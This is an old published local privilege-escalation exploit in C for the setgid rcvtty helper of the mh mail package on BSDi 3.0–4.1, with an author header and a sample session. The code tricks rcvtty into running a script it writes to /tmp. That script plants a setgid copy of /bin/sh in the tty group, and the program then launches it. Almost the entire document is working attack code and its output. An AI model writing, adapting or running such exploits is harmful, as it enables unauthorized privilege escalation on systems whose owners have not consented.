BSDI 3.0/4.0 /usr/contrib/mh/lib/rcvtty local exploit - Gives a egid=4(tty) shell.
97df13bd07d261bb87a10c4f6335d25e1cca2a73e97e369c44265dec113c0303
/* (BSDi3.0-4.1)rcvtty[mh] local exploit, by v9[v9@fakehalo.org]. this exploit
is for the rcvtty of the mh package, which is setgid=4(tty) on BSDi. this
exploit gives you egid/group=4(tty) access. (rm#2)
example:
-------------------------------------------------
bash-2.02$ id
uid=101(v9) gid=100(user) groups=100(user)
bash-2.02$ cc xrcvtty.c -o xrcvtty
bash-2.02$ ./xrcvtty
[ (BSDi3.0-4.1)rcvtty[mh] local exploit, by v9[v9@fakehalo.org]. ]
[*] /usr/contrib/mh/lib/rcvtty appears to be setgid tty(4).
[*] now making shell script to execute.
[*] done, now building and executing the command line.
[*] done, now checking for success.
[*] success, /tmp/ttysh is now setgid tty(4).
[*] finished, everything appeared to have gone successful.
[?] do you wish to enter the sgidshell now(y/n)?: y
[*] ok, executing shell(/tmp/ttysh) now.
$ id
uid=101(v9) gid=100(user) egid=4(tty) groups=4(tty), 100(user)
$
-------------------------------------------------
info: findings and exploit by v9[v9@fakehalo.org].
*/
#define PATH "/usr/contrib/mh/lib/rcvtty" /* path to rcvtty. */
#define MAKESHELL "/tmp/mksh.sh" /* tmpfile to exec. */
#define SGIDSHELL "/tmp/ttysh" /* gidshell location. *
/
#define GIDTTY 4 /* gid of tty group */
#include <stdio.h>
#include <sys/stat.h>
main(){
char cmd[256],in[0];
struct stat mod1,mod2;
FILE *sgidexec;
fprintf(stderr,"[ (BSDi3.0-4.1)rcvtty[mh] local exploit, by v9[v9@fakehalo.org
"
"]. ]\n\n");
if(stat(PATH,&mod1)){
fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
exit(1);
}
else if(mod1.st_mode==34285&&mod1.st_gid==GIDTTY){
fprintf(stderr,"[*] %s appears to be setgid tty(%d).\n",PATH,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid tty(%d).\n",PATH,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] now making shell script to execute.\n");
unlink(MAKESHELL);
sgidexec=fopen(MAKESHELL,"w");
fprintf(sgidexec,"#!/bin/sh\n");
fprintf(sgidexec,"cp /bin/sh %s\n",SGIDSHELL);
fprintf(sgidexec,"chgrp %d %s\n",GIDTTY,SGIDSHELL);
fprintf(sgidexec,"chmod 2755 %s\n",SGIDSHELL);
fclose(sgidexec);
chmod(MAKESHELL,33261);
fprintf(stderr,"[*] done, now building and executing the command line.\n");
snprintf(cmd,sizeof(cmd),"echo yes | %s %s 1>/dev/null 2>&1",PATH,MAKESHELL);
system(cmd);
unlink(MAKESHELL);
fprintf(stderr,"[*] done, now checking for success.\n");
if(stat(SGIDSHELL,&mod2)){
fprintf(stderr,"[!] failed, %s doesn't exist.\n",SGIDSHELL);
exit(1);
}
else if(mod2.st_mode==34285&&mod2.st_gid==GIDTTY){
fprintf(stderr,"[*] success, %s is now setgid tty(%d).\n",SGIDSHELL,GIDTTY);
}
else{
fprintf(stderr,"[!] failed, %s isn't setgid tty(%d).\n",SGIDSHELL,GIDTTY);
exit(1);
}
fprintf(stderr,"[*] finished, everything appeared to have gone successful.\n")
;
fprintf(stderr,"[?] do you wish to enter the sgidshell now(y/n)?: ");
scanf("%s",in);
if(in[0]!=0x59&&in[0]!=0x79){
printf("[*] ok, aborting execution, the shell is: %s.\n",SGIDSHELL);
}
else{
printf("[*] ok, executing shell(%s) now.\n",SGIDSHELL);
execl(SGIDSHELL,SGIDSHELL,0);
}
exit(0);
}